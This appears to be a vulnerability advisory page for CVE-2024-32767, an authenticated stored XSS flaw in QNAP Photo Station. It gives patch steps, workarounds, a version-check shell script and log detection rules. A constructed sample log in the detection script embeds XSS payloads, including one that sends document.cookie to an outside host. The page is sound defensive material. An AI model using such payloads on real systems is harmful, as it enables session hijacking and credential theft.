CVE-2024-32767

6.3 MEDIUM

📋 TL;DR

This cross-site scripting (XSS) vulnerability in QNAP Photo Station allows remote attackers who hold a Photo Station account to inject script into pages served by the application. When another user views the affected page, the script runs in that user's browser with that user's session, enabling session hijacking, credential theft through injected forms, or redirection to malicious content. Organizations running vulnerable versions of Photo Station on QTS are affected.

💻 Affected Systems

Products:
  • QNAP Photo Station
Versions: prior to 6.4.3
Operating Systems: QTS (QNAP Turbo NAS operating system)
Default Config Vulnerable: ⚠️ Yes
Notes: Requires the attacker to hold a user account with access to the Photo Station application; unauthenticated exploitation is not possible

📦 What is this software?

Photo Station is QNAP's web-based photo management application for QTS NAS devices. It organizes and shares photos stored on the NAS, is installed from App Center, and is served through the QTS web interface.

⚠️ Risk & Real-World Impact

🔴 Worst Case

An administrator opens a page carrying the injected script. The script runs with the administrator's Photo Station session, so the attacker can steal that session, capture credentials through an injected login form, and take full control of the Photo Station application. Reaching other systems or deploying ransomware would require chaining with additional weaknesses on the NAS or network; the XSS alone does not provide that.

🟠 Likely Case

An attacker with user-level access plants a script that steals the session cookies of other users, performs Photo Station actions on their behalf, or redirects them to malicious sites.

🟢 If Mitigated

With Photo Station reachable only from trusted internal networks and a reverse proxy or WAF filtering requests in front of it, exposure is limited to accounts already on that network and impact stays within Photo Station sessions.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires an authenticated Photo Station account; the injection itself uses standard XSS techniques, and a victim must view the affected page for the script to run.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Photo Station 6.4.3 (2024/07/12) and later

Vendor Advisory: https://www.qnap.com/en/security-advisory/qsa-24-39

Restart Required: Yes

Instructions:

1. Log in to QTS and open App Center
2. Check for a Photo Station update
3. Install version 6.4.3 or later
4. Restart the Photo Station app (stop and start it from App Center if it does not restart on its own)

🔧 Temporary Workarounds

Disable Photo Station (applies to: all)

Temporarily stop the Photo Station app if patching is not immediately possible.

QTS App Center → Photo Station → Stop (App Center is its own QTS application, not part of Control Panel)

Network Isolation (applies to: all)

Restrict access to Photo Station to trusted internal networks only.

Photo Station is served through the QTS web interface, so firewall rules must block external access to the QTS web server ports (the HTTP/HTTPS ports configured in Control Panel → System → General Settings) rather than a separate Photo Station port. Also remove any myQNAPcloud or UPnP port forwarding that exposes the QTS web interface to the internet.

🧯 If You Can't Patch

  • Put Photo Station behind a reverse proxy or WAF you control and apply input validation and output encoding rules there; treat this as a stopgap, since signature-based filtering is bypassable and does not fix the flaw in the application
  • Have that proxy add a Content-Security-Policy header to Photo Station responses to restrict script execution; test the policy against normal use first, because a strict policy can break the application's own scripts
  • Limit who holds Photo Station accounts and remove unused ones, since exploitation needs an authenticated user

🔍 How to Verify

Check if Vulnerable:

Read the installed Photo Station version in QNAP App Center, or over SSH read the QPKG registry that QTS keeps in /etc/config/qpkg.conf:

grep -i -A8 '^\[Photo' /etc/config/qpkg.conf | grep -i '^Version'

Any version below 6.4.3 is vulnerable.

Verify Fix Applied:

Confirm the version reported by App Center or by the command above is 6.4.3 or higher.
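The comparison is easy to get wrong by hand (a plain string compare puts 6.4.10 below 6.4.3). The following POSIX shell script is an added example, not QNAP's own tooling: it pulls the Version field out of a qpkg.conf-style registry and compares it field by field against the fixed release. It assumes the Photo Station section is named [PhotoStation] with a "Version = x.y.z" line; the registry snippet embedded below is constructed for offline use, and on a real NAS you would point check_registry at /etc/config/qpkg.conf instead.

```shell
#!/bin/sh
# Added example (not from the QNAP advisory): decide whether an installed
# Photo Station version is below the fixed release 6.4.3.
# Versions are compared field by field so that 6.4.10 > 6.4.3.

FIXED_VERSION="6.4.3"

# version_lt A B -> exit 0 if A is numerically lower than B, else 1
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, pa, "."); nb = split(b, pb, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            x = (i <= na) ? pa[i] + 0 : 0
            y = (i <= nb) ? pb[i] + 0 : 0
            if (x < y) exit 0
            if (x > y) exit 1
        }
        exit 1   # equal -> not lower
    }'
}

# photo_station_status VERSION -> prints "vulnerable" or "patched"
photo_station_status() {
    if version_lt "$1" "$FIXED_VERSION"; then
        echo vulnerable
    else
        echo patched
    fi
}

# extract_version FILE -> prints the Version field of the first section whose
# name starts with "[Photo" (assumed: [PhotoStation] in /etc/config/qpkg.conf)
extract_version() {
    awk -F'[ =]+' '
        /^\[/ { in_section = (tolower($0) ~ /^\[photo/) }
        in_section && tolower($1) == "version" { print $2; exit }
    ' "$1"
}

# check_registry FILE -> one-line verdict for the registry at FILE
check_registry() {
    v=$(extract_version "$1")
    echo "Photo Station $v: $(photo_station_status "$v")"
}

# Constructed sample registry (not a real NAS file); a real check reads
# /etc/config/qpkg.conf on the NAS.
SAMPLE_CONF="${TMPDIR:-/tmp}/qpkg.conf.sample.$$"
cat > "$SAMPLE_CONF" <<'EOF'
[MultimediaConsole]
Name = MultimediaConsole
Version = 2.2.0
[PhotoStation]
Name = PhotoStation
Version = 6.4.2
Enable = TRUE
EOF

check_registry "$SAMPLE_CONF"    # Photo Station 6.4.2: vulnerable
rm -f "$SAMPLE_CONF"
```

Run it as-is to see the constructed case, or replace the sample path with /etc/config/qpkg.conf on the NAS; the field-by-field compare also accepts versions with a different number of components (6.4 is treated as 6.4.0).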

📡 Detection & Monitoring

Log Indicators:

  • POST requests to Photo Station endpoints whose parameters or bodies carry script markup (<script, onerror=, javascript:) in raw or URL/HTML-encoded form
  • The same markup appearing in stored Photo Station content that is later served back to other users

Network Indicators:

  • Failed authentication attempts followed by a successful login and requests carrying script-like payloads (an attacker who first obtained a low-privilege account)
  • Browsers of Photo Station users connecting to unfamiliar external hosts right after loading Photo Station pages (injected script exfiltrating session tokens)

SIEM Query (pseudo-syntax; adapt the field names to your platform):

source="qnap_logs" AND app="photo_station" AND (url="*<script*" OR url="*%3Cscript*" OR param="*javascript:*" OR param="*onerror=*")

Payloads are almost always percent-encoded in access logs, so a rule that matches only the literal "<script" string misses most real attempts; match the encoded variants too, or URL-decode the request before matching.
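To show the encoding point concretely, here is an added shell example (not the page's SIEM rule and not QNAP tooling) that triages access-log lines for Photo Station XSS attempts, matching both raw and percent-encoded markers. It assumes Photo Station requests live under the /photo/ path of the QTS web server; the log lines embedded below are constructed in Apache combined format with illustrative endpoint names, not captured from a real NAS.

```shell
#!/bin/sh
# Added example: flag web access-log lines that look like XSS attempts against
# Photo Station. A rule that only matches the literal "<script" misses the
# encoded form ("%3Cscript") that appears in most logs, so both are listed.

# Raw and URL-encoded variants of the usual XSS markers (matched case-insensitively).
XSS_PATTERN='<script|%3cscript|javascript:|javascript%3a|onerror=|onerror%3d|onload=|onload%3d|<svg|%3csvg|<img|%3cimg'

# scan_xss: reads log lines on stdin, prints the suspicious Photo Station ones.
# Assumption: Photo Station is served under /photo/ on the QTS web server.
scan_xss() {
    grep -i '/photo/' | grep -iE "$XSS_PATTERN"
}

# count_xss: reads log lines on stdin, prints the number of suspicious lines.
count_xss() {
    scan_xss | grep -c .
}

# Constructed sample log (not real QNAP logs; endpoint names are illustrative).
# Line 2 carries a percent-encoded <script> payload, line 3 a raw <img onerror=>,
# line 5 contains the word "script" in harmless album text and must not match.
sample_log() {
cat <<'EOF'
10.0.0.5 - alice [12/Jul/2024:10:01:02 +0000] "POST /photo/p/api/album.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - bob [12/Jul/2024:10:02:15 +0000] "POST /photo/p/api/album.php?name=%3Cscript%3Efetch('http://10.0.0.99/?c='%2Bdocument.cookie)%3C/script%3E HTTP/1.1" 200 128 "-" "Mozilla/5.0"
10.0.0.7 - bob [12/Jul/2024:10:02:40 +0000] "GET /photo/p/api/photo.php?desc=<img src=x onerror=alert(1)> HTTP/1.1" 200 256 "-" "Mozilla/5.0"
10.0.0.9 - carol [12/Jul/2024:10:03:00 +0000] "GET /cgi-bin/filemanager/utilRequest.cgi?func=get_list HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - carol [12/Jul/2024:10:03:20 +0000] "GET /photo/p/api/photo.php?desc=holiday%20script HTTP/1.1" 200 256 "-" "Mozilla/5.0"
EOF
}

sample_log | scan_xss      # prints the two lines from bob
sample_log | count_xss     # 2
```

Feed real logs with `scan_xss < access.log`; the pattern list is deliberately broad for triage, so review hits by hand before alerting on them.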

🔗 References

  • QNAP Security Advisory QSA-24-39: https://www.qnap.com/en/security-advisory/qsa-24-39
